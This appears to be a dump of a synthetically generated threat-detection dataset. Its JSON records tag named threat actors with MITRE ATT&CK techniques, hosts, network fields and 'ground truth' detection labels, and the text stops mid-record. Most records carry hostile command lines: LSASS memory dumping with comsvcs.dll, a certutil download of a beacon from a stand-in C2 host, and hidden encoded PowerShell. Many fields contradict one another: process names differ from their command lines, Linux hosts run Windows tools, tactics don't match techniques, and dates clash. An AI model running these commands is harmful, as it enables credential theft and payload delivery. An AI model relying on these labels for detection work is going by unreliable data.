text
stringlengths
1.13k
1.33k
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Defense Evasion","Privilege Escalation"],"technique_id":"T1098.004"},"event_id":"evt_scatteredspider_20260726T044219000Z_0016801","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.181.12.232","name":"EC2-INST-WEVQRV5TNC","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16801Scattered SpiderT1098.004"},"network":{"domain":"update.microsoft.com","dst_ip":"1.182.214.173","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-11-20T02:41:00.000Z","user":{"name":"i-0sp8f6tves6n","sid":"S-1-5-21-791431868-715094220-3158"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Exfiltration","Credential Access","Command and Control"],"technique_id":"T1546.003"},"event_id":"evt_lapsus_20260917T162217000Z_0016803","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["WMI","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.233.70.101","name":"AZURE-VM-NIWZ7CR6A0","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16803Lapsus$T1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.104.71.194","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3979 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-12-20T12:54:38.000Z","user":{"name":"i-3y2pf9xfeqz6","sid":"S-1-5-21-697525154-758205026-5219"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1071.001 using cloud-native technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Lateral Movement"],"technique_id":"T1071.001"},"event_id":"evt_apt29_20261125T024709000Z_0016805","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.226.219.228","name":"IAM-ROLE-4513X644BV","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16805APT29T1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.71.132.182","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-10-03T15:39:27.000Z","user":{"name":"CORP\\obfl5arlkj8x","sid":"S-1-5-21-751853416-543344088-8997"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Impact","Command and Control"],"technique_id":"T1566.001"},"event_id":"evt_mustangpanda_20260522T170719000Z_0016807","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.161.85.5","name":"WIN-FIN-SRV-ZOEL1MQ6X1","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16807Mustang PandaT1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.40.115.128","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1145 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-08-04T22:23:42.000Z","user":{"name":"svc_skp6305sp1ue","sid":"S-1-5-21-194221950-554379981-3475"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1531 using encrypted C2 technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Persistence","Discovery"],"technique_id":"T1531"},"event_id":"evt_volttyphoon_20250609T042644000Z_0016809","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.8.91.69","name":"WIN-FIN-SRV-56QJ65R65K","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16809Volt TyphoonT1531"},"network":{"domain":"cdn-content.com","dst_ip":"1.46.99.196","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-03-27T07:13:55.000Z","user":{"name":"arn:aws:iam::01rl8d0gcmlp","sid":"S-1-5-21-383957092-895629077-4376"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Exfiltration","Execution"],"technique_id":"T1484.001"},"event_id":"evt_scatteredspider_20250522T161905000Z_0016811","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.47.60.72","name":"EC2-INST-TP5JYU7HXE","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16811Scattered SpiderT1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.124.250.235","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1918 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-11-15T00:12:50.000Z","user":{"name":"azuread\\pl2ej09o2kms","sid":"S-1-5-21-875575396-435759452-4925"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Persistence","Initial Access"],"technique_id":"T1546.003"},"event_id":"evt_lapsus_20251216T105721000Z_0016813","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.49.45.162","name":"AZURE-VM-X06IAY04TA","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16813Lapsus$T1546.003"},"network":{"domain":"github.com","dst_ip":"1.136.96.17","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"certutil.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-05-08T06:57:00.000Z","user":{"name":"azuread\\rjgyj1cjpo8p","sid":"S-1-5-21-103118541-715250179-7867"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Privilege Escalation","Initial Access"],"technique_id":"T1098.004"},"event_id":"evt_apt41_20251129T032012000Z_0016815","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.96.232.116","name":"APP-WEB-GCZVURJEEB","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16815APT41T1098.004"},"network":{"domain":"github.com","dst_ip":"1.182.119.95","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-07-29T13:17:01.000Z","user":{"name":"svc_0t8bs6d7apfm","sid":"S-1-5-21-895467394-517473283-6176"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1484.001 using LOLBin technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Defense Evasion","Credential Access","Discovery"],"technique_id":"T1484.001"},"event_id":"evt_apt29_20261024T031929000Z_0016817","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.82.186.246","name":"DB-ORACLE-36W2M5J7K4","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16817APT29T1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.75.25.75","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2210 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-03-19T06:05:19.000Z","user":{"name":"CORP\\eyb9bj4jgjju","sid":"S-1-5-21-202093415-487137621-3312"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Execution","Exfiltration","Initial Access"],"technique_id":"T1566.001"},"event_id":"evt_apt29_20260820T223826000Z_0016819","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.180.42.162","name":"IAM-ROLE-79WAJ7JCHU","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16819APT29T1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.159.242.24","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-10-03T14:33:07.000Z","user":{"name":"CORP\\97y0130pkgte","sid":"S-1-5-21-347888871-878618291-5713"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1059.001 using LOLBin technique.","sub_technique":"PowerShell","tactic":["Credential Access","Command and Control","Initial Access"],"technique_id":"T1059.001"},"event_id":"evt_unc4841_20260328T031658000Z_0016821","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.0.96.2","name":"WIN-FIN-SRV-GX3XHCVZ61","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16821UNC4841T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.80.106.194","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"wmic.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-04-26T04:47:30.000Z","user":{"name":"CORP\\3bzo4qbjrco1","sid":"S-1-5-21-613505971-185819576-5956"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Discovery","Reconnaissance"],"technique_id":"T1059.001"},"event_id":"evt_apt41_20260827T021632000Z_0016823","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.70.179.52","name":"EC2-INST-TSRHCWQPH8","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16823APT41T1059.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.188.165.243","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1516 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-11-30T05:28:51.000Z","user":{"name":"svc_8jnkzz074wjc","sid":"S-1-5-21-519121426-627513554-1301"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1566.001 using LOLBin technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Lateral Movement"],"technique_id":"T1566.001"},"event_id":"evt_apt41_20260812T023555000Z_0016825","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.246.39.11","name":"EC2-INST-9X6Z0FHRQA","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16825APT41T1566.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.87.110.60","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1163 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2026-05-26T04:32:18.000Z","user":{"name":"CORP\\r8x3f962xzh7","sid":"S-1-5-21-509414132-650679623-2836"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Command and Control","Execution"],"technique_id":"T1531"},"event_id":"evt_apt29_20250322T155203000Z_0016827","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.58.74.210","name":"WIN-FIN-SRV-2KX7X27B5K","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16827APT29T1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.55.66.198","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-04-17T08:07:11.000Z","user":{"name":"CORP\\milj5qyvapxe","sid":"S-1-5-21-965740289-419938439-5272"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Lateral Movement"],"technique_id":"T1570"},"event_id":"evt_apt41_20260427T201536000Z_0016829","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.104.184.164","name":"IAM-ROLE-5BH0DGOTQE","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16829APT41T1570"},"network":{"domain":"github.com","dst_ip":"1.50.107.117","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2158 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-01-28T16:54:01.000Z","user":{"name":"azuread\\2qvs5p814rhp","sid":"S-1-5-21-547417862-972426495-8309"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Command and Control","Credential Access","Discovery"],"technique_id":"T1546.003"},"event_id":"evt_scatteredspider_20260721T012215000Z_0016831","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.39.21.240","name":"WIN-FIN-SRV-7RVC9CUG82","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16831Scattered SpiderT1546.003"},"network":{"domain":"github.com","dst_ip":"1.166.41.163","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 982 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-07-21T04:08:12.000Z","user":{"name":"CORP\\zk4ku3rorl2y","sid":"S-1-5-21-209735727-541807514-5238"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Persistence","Collection","Exfiltration"],"technique_id":"T1021.006"},"event_id":"evt_lapsus_20261103T231118000Z_0016833","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.252.205.20","name":"IAM-ROLE-4FE611R5N1","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16833Lapsus$T1021.006"},"network":{"domain":"github.com","dst_ip":"1.31.88.89","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2026-05-21T10:34:11.000Z","user":{"name":"CORP\\2sasy0rmrevf","sid":"S-1-5-21-331276881-827674680-2714"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Exfiltration"],"technique_id":"T1484.001"},"event_id":"evt_apt41_20260116T233415000Z_0016835","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.151.249.60","name":"APP-WEB-QRGP457ZP4","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16835APT41T1484.001"},"network":{"domain":"github.com","dst_ip":"1.149.162.72","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-06-22T06:49:22.000Z","user":{"name":"azuread\\yhz7f35gn8io","sid":"S-1-5-21-429824410-510524590-6148"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Privilege Escalation","Impact","Exfiltration"],"technique_id":"T1531"},"event_id":"evt_scatteredspider_20261120T101349000Z_0016837","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.140.34.253","name":"EC2-INST-J5E4RE0QTZ","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16837Scattered SpiderT1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.160.35.196","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-10-15T02:16:52.000Z","user":{"name":"svc_2pkwlxcoqhjp","sid":"S-1-5-21-850576949-462737670-5038"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Command and Control","Credential Access"],"technique_id":"T1570"},"event_id":"evt_lapsus_20260309T122203000Z_0016839","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.96.120.191","name":"WIN-FIN-SRV-GOWWJGHERP","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16839Lapsus$T1570"},"network":{"domain":"cdn-content.com","dst_ip":"1.162.204.66","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-05-11T02:11:53.000Z","user":{"name":"i-0mrj2icii6oy","sid":"S-1-5-21-707004435-384451389-5802"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Discovery","Initial Access","Reconnaissance"],"technique_id":"T1570"},"event_id":"evt_fin7_20250330T153914000Z_0016841","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.51.73.97","name":"DB-ORACLE-NQTDCD5DBI","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16841FIN7T1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.11.22.100","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-12-01T07:02:00.000Z","user":{"name":"azuread\\efdoc0s6nmpg","sid":"S-1-5-21-689994384-566799325-9707"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Discovery","Command and Control","Execution"],"technique_id":"T1546.003"},"event_id":"evt_mustangpanda_20260222T220120000Z_0016843","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["WMI","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.201.191.231","name":"APP-WEB-PX8L0JCSHH","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16843Mustang PandaT1546.003"},"network":{"domain":"cdn-content.com","dst_ip":"1.52.232.90","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-05-13T03:15:57.000Z","user":{"name":"azuread\\4j8j4g3t0c2u","sid":"S-1-5-21-933163069-288850624-7716"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Collection"],"technique_id":"T1531"},"event_id":"evt_scatteredspider_20250419T061631000Z_0016845","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.153.164.126","name":"DB-ORACLE-97WQMG0K5V","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16845Scattered SpiderT1531"},"network":{"domain":"github.com","dst_ip":"1.46.16.59","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3775 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2025-07-17T15:19:44.000Z","user":{"name":"arn:aws:iam::oyytftj8myga","sid":"S-1-5-21-611264669-610970585-3613"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Defense Evasion","Command and Control"],"technique_id":"T1484.001"},"event_id":"evt_mustangpanda_20260301T095946000Z_0016847","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.102.188.113","name":"WIN-FIN-SRV-6HJO74UGFY","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16847Mustang PandaT1484.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.26.164.125","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc 